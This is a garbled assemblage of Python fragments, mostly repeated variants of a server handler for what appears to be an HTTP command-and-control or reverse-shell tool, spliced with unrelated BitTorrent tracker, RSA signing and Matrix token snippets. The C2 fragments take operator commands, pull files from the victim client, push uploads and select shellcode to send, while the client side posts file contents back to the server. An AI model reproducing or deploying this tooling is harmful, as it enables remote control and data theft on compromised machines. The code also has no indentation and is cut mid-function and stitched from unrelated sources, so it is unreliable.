def handleGET():
global upload_contents, cmd_contents, waiting
try:
if waiting == True:
waiting = False
time.sleep(.1)
ret(.1)
prompt = craft_prompt(request.headers, request.remote_addr)
cmd = input(prompt)
if cmd:
if unix_path.match(cmd):
return redirect(
url_for('download',
filepath=benc(
unix_path.search(cmd).group(1).encode())))
elif unix_upld.match(cmd):
filepath = cmd.split()[1]
if valid_file(filepath):
file_name = unix_upld.search(cmd).group(2).encode()
with open(filepath, 'rb') as f:
upload_contents = benc(f.read())
return redirect(url_for('upload', filename=file_name))
else:
abort(404)
elif wind_path.match(cmd):
return redirect(
url_for('download',
filepath=benc(
wind_path.search(cmd).group(1).encode())))
elif wind_upld.match(cmd):
filepath = cmd.split()[1]
if valid_file(filepath):
file_name = wind_upld.search(cmd).group(2).encode()
with open(filepath, 'rb') as f:
upload_contents = benc(f.read())
return redirect(url_for('upload', filename=file_name))
else:
abort(404)
elif clear_cmd.match(cmd):
os.system('cls') if os.name == 'nt' else os.system('clear')
return emptyresponse
elif exit_cmd.match(cmd):
cmd_contents = cmd
waiting = True
startloading()
return redirect(url_for('commander'))
else:
cmd_contents = cmd
return redirect(url_for('commander'))
else:
return emptyresponse
except EOFError:
abort(404)
if any(command in res.url for command in special_commands):
if 'upload' in res.url:
filename = res.url.split('/')[-1]
with open(filename, 'wb') as w:
w.write(bdec(res.text))
s.post(SERVER,
headers={
"Filename" : filename,
"Action" : 'upload'
},
data='Upload Successful!')
elif 'download' in res.url:
filepath = bdec(str(unquote(res.url.split('/')[-1]))).decode("utf-8")
if valid_file(filepath):
with open(filepath, 'rb') as f:
file_contents = benc(f.read())
if unix_path.match(filepath):
file_name = unix_path.search(filepath).group(2)
else:
file_name = wind_path.search(filepath).group(2)
s.post(SERVER,
headers={
"Filename" : file_name,
"Action" : 'download'
},
data=file_contents)
else:
s.post(SERVER, data='ERROR: File does not exist or is not readable!')
else:
shl_id = res.url.split('/')[-1]
shellcode = res.content
if 'upload' in res.url:
filename = res.url.split('/')[-1]
with open(filename, 'wb') as w:
w.write(bdec(res.text))
s.post(SERVER,
headers={
"Filename": filename,
"Action": 'upload'
},
data='Upload Successful!')
elif 'download' in res.url:
filepath = bdec(str(unquote(
res.url.split('/')[-1]))).decode("utf-8")
if valid_file(filepath):
with open(filepath, 'rb') as f:
file_contents = benc(f.read())
if unix_path.match(filepath):
file_name = unix_path.search(filepath).group(2)
else:
file_name = wind_path.search(filepath).group(2)
s.post(SERVER,
headers={
"Filename": file_name,
"Action": 'download'
},
data=file_contents)
else:
s.post(
SERVER,
data=
'ERROR: File does not exist or is not readable!')
coreSock.sendto(response, (address[0], address[1]))
continue
elif connections[address[0]+':'+str(address[1])] != connection_id:
print(connections)
print(connection_id)
print(transaction_id)
response = pbit32(3) + pbit32(transaction_id) + struct.pack('>p', "Can not bypass connection request.")
coreSock.sendto(response, (address[0], address[1]))
raise KeyError('Client tried to bypass connection sync')
elif action == 1:
print('Got a announce request:')
info_hash = benc(data[16:36])
peer_id = benc(data[36:56])
downloaded = bit64(data[56:56+8])
left = bit64(data[64:64+8])
uploaded = bit64(data[72:72+8])
event = bit32(data[80:80+4]) # 0: none; 1: completed; 2: started; 3: stopped
announceip = bit32(data[84:84+4]) # 0 == default
key = bit32(data[88:88+4])
num_want = bit32(data[92:92+4])
port = num_want = bit16(data[96:96+2]) # -1 == default
print(' Downloaded:',downloaded)
print(' left:',left)
print(' key:',key)
if 0 < num_want < 500:
signature = b'b64enc(sigdata(msg))'
import rsa
from base64 import b64encode as benc
from base64 import b64decode as bdec
plaintext = b"msg"
with open(keyfile) as fh:
data = fh.read()
privkey = rsa.PrivateKey.load_pkcs1(data)
pubkey = rsa.PublicKey.load_pkcs1(data)
rsasignature = rsa.sign(plaintext, privkey, 'SHA-256')
print('Ext-Sig:', signature)
print('RSA-Sig:', benc(rsasignature))
print(rsa.verify(plaintext, bdec(signature), pubkey))
def handleGET():
global upload_contents, cmd_contents, waiting, pastcmds
try:
if waiting == True:
waiting = False
time.sleep(.1)
ret(.1)
prompt = craft_prompt(request.headers, request.remote_addr)
cmd = input(prompt)
if cmd or not cmd.startswith('#'):
pastcmds.append(cmd)
if history_cmd.match(cmd) and pastcmds:
pastcmds.pop()
if os.name != 'nt':
q = [
inquirer.List('past_cmd',
message='Command history',
choices=pastcmds,
default=pastcmds[-1]),
]
cmd = inquirer.prompt(q, theme=GreenPassion())['past_cmd']
pastcmds.append(cmd)
else:
print(
f"{B}ERROR:{RA} The history command currently doesn't work on Windows systems..."
)
return emptyresponse
if unix_path.match(cmd):
return redirect(
url_for('download',
filepath=benc(
unix_path.search(cmd).group(1).encode())))
elif unix_upld.match(cmd):
filepath = cmd.split()[1]
if valid_file(filepath):
file_name = unix_upld.search(cmd).group(2).encode()
with open(filepath, 'rb') as f:
upload_contents = benc(f.read())
return redirect(url_for('upload', filename=file_name))
else:
abort(404)
elif wind_path.match(cmd):
return redirect(
url_for('download',
filepath=benc(
wind_path.search(cmd).group(1).encode())))
elif wind_upld.match(cmd):
filepath = cmd.split()[1]
if valid_file(filepath):
file_name = wind_upld.search(cmd).group(2).encode()
with open(filepath, 'rb') as f:
upload_contents = benc(f.read())
return redirect(url_for('upload', filename=file_name))
else:
abort(404)
elif clear_cmd.match(cmd):
os.system('cls') if os.name == 'nt' else os.system('clear')
return emptyresponse
elif show_shellcodes.match(cmd):
reload(utils)
if utils.shellcodes[1][0]:
for k, v in utils.shellcodes.items():
print(f"{B+str(k)+RA} => {v[0]}")
else:
print(f"[{B}ERROR{RA}] There are no shellcodes available.")
return emptyresponse
elif set_shellcode.match(cmd):
shc_id = int(set_shellcode.search(cmd).group(1))
reload(utils)
try:
if utils.shellcodes[shc_id][0]:
return redirect(url_for('setshellcode', shc_id=shc_id))
else:
print(f"[x] There is no shellcode with id: {shc_id}")
return emptyresponse
except KeyError:
print(f"[x] There is no shellcode with id: {shc_id}")
return emptyresponse
elif help_cmd.match(cmd):
print(tabulate(commands, headers=["Command", "Description"]))
return emptyresponse
elif exit_cmd.match(cmd):
cmd_contents = cmd
waiting = True
startloading()
return redirect(url_for('commander'))
else:
cmd_contents = cmd
return redirect(url_for('commander'))
else:
return emptyresponse
except EOFError:
abort(404)
def handleGET():
global upload_contents, cmd_contents, waiting
try:
if waiting == True:
waiting = False
time.sleep(.1)
ret(.1)
prompt = craft_prompt(request.headers, request.remote_addr)
cmd = input(prompt)
if cmd:
if unix_path.match(cmd):
return redirect(
url_for('download',
filepath=benc(
unix_path.search(cmd).group(1).encode())))
elif unix_upld.match(cmd):
filepath = cmd.split()[1]
if valid_file(filepath):
file_name = unix_upld.search(cmd).group(2).encode()
with open(filepath, 'rb') as f:
upload_contents = benc(f.read())
return redirect(url_for('upload', filename=file_name))
else:
abort(404)
elif wind_path.match(cmd):
return redirect(
url_for('download',
filepath=benc(
wind_path.search(cmd).group(1).encode())))
elif wind_upld.match(cmd):
filepath = cmd.split()[1]
if valid_file(filepath):
file_name = wind_upld.search(cmd).group(2).encode()
with open(filepath, 'rb') as f:
upload_contents = benc(f.read())
return redirect(url_for('upload', filename=file_name))
else:
abort(404)
elif clear_cmd.match(cmd):
os.system('cls') if os.name == 'nt' else os.system('clear')
return emptyresponse
elif show_shellcodes.match(cmd):
reload(utils)
if utils.shellcodes[1][0]:
for k, v in utils.shellcodes.items():
print(f"{B+str(k)+RA} => {v[0]}")
else:
print(f"[{B}ERROR{RA}] There are no shellcodes available.")
return emptyresponse
elif set_shellcode.match(cmd):
shc_id = int(set_shellcode.search(cmd).group(1))
reload(utils)
try:
if utils.shellcodes[shc_id][0]:
return redirect(url_for('setshellcode', shc_id=shc_id))
else:
print(f"[x] There is no shellcode with id: {shc_id}")
return emptyresponse
except KeyError:
print(f"[x] There is no shellcode with id: {shc_id}")
return emptyresponse
elif help_cmd.match(cmd):
print(commands[1:-1])
return emptyresponse
elif exit_cmd.match(cmd):
cmd_contents = cmd
waiting = True
startloading()
return redirect(url_for('commander'))
else:
cmd_contents = cmd
return redirect(url_for('commander'))
else:
return emptyresponse
except EOFError:
abort(404)
import hashlib
import time
import os
from base64 import b64encode as benc
m = hashlib.sha256()
m.update(benc(os.urandom(64)) + b'id' + bytes(str(time.time()), 'UTF-8'))
print('id:', m.hexdigest())
m = hashlib.sha256()
m.update(
benc(os.urandom(64)) + b"smsGateway" + bytes(str(time.time()), 'UTF-8') +
b'hs')
print('hs_token:', m.hexdigest())
m = hashlib.sha256()
m.update(
benc(os.urandom(64)) + b"as" + bytes(str(time.time()), 'UTF-8') +
b'smsGateway')
print('as_token:', m.hexdigest())
print('''namespaces:
users:
- exclusive: true
regex: '@sms_.*:matrix\.domain\.com'
aliases:
- exclusive: true
regex: '#sms_.*:matrix\.domain\.com'
rooms:
- exclusive: false
regex: '!lEsjTTtbVuKfpEhxtT:matrix.domain.com'
decoded = parse_transfered_bytes(data)
if decoded is -1:
if not fileno in data_queue:
data_queue[fileno] = b''
data_queue[fileno] += data
continue
else:
if fileno in data_queue:
del(data_queue[fileno])
decoded, rest = decoded
if decoded == b'BitTorrent protocol':
majorProtocol = struct.unpack('>I', rest[:4])[0]
protocol = struct.unpack('>I', rest[3:7])[0]
info_hash = benc(rest[7:27])
peer_id = rest[27:48]
trash = rest[47:]
print('Peer ID:', [peer_id])
print('Protocol:', [protocol])
print('Info hash:', [info_hash])
print('Trash?', [trash])
response = b''
protMsg = b'BitTorrent protocol'
response += struct.pack('b', len(protMsg))
response += protMsg
response += struct.pack('>I', 0) # majorProtocol
response += struct.pack('>I', 1048581) #\x00\x10\x00\x05 - Some undocumented shit you're supposed to respond with
response += bdec(info_hash) # If we got it, we'll respond yes
def gen_UID():
return benc(bytes(str(time()), 'UTF-8') + urandom(16)).decode('UTF-8')
